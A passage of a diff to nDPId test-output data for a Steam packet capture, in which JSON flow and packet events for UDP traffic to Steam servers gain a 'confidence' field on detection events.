+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1357332164987,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164987,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARZ6rAqLyV0G+FVbJhaYoALIgcVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1357332165015,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165015,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTIAAIAROeSSQpgOwKi8lWmLsmEANBm8VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAc5jYKUQBAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1357332165017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165017,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTMAAIAR6HHQb6tSwKi8lWmJsmEANJoiVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA03wFcOUAAAA="}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1357332165020,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165020,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTQAAIARjWtFHJGrwKi8lWmJsmEANNwtVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAk2i\/c84AAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1357332165027,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165027,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTUAAIAR3d5IpT2uwKi8lWmJsmEANL5BVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAyxQbKKkAAAA="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1357332165037,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165037,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L7AqLyVUatzBbJhaYoALBkxVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1357332165037,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165037,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxvAqLyVSKU9r7JhaYkALFeOVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1357332165037,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165037,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARORzAqLyVy025BbJhaYkALFmPVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165038,"flow_last_seen":1357332165038,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165038,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1357332165038,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165038,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx3AqLyVkkKYD7JhaYoALLOPVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165038,"flow_last_seen":1357332165038,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165038,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165038,"flow_last_seen":1357332165038,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165038,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1357332165075,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165075,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTYAAIAR3dxIpT2vwKi8lWmJsmEANO1rVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAw5zrdLEAAAA="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1357332165087,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165087,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx3AqLyVkkKYD7JhaYsALLOOVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1357332165087,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165087,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxzAqLyVSKU9rrJhaYoALFeOVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1357332165088,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165088,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARZ6vAqLyV0G+FVLJhaYkALIgeVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1357332165088,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165088,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkyDAqLyVkkKYDLJhaYkALLOTVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1357332165121,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165121,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTcAAIAROeCSQpgNwKi8lWmJsmEANEZHVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAkDOUBj8BAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1357332165125,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165125,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTgAAIAR3dtIpT2uwKi8lWmKsmEANFKmVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAqXeqX6cAAAA="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1357332165137,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165137,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LzAqLyVUatzB7JhaYkALBkwVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
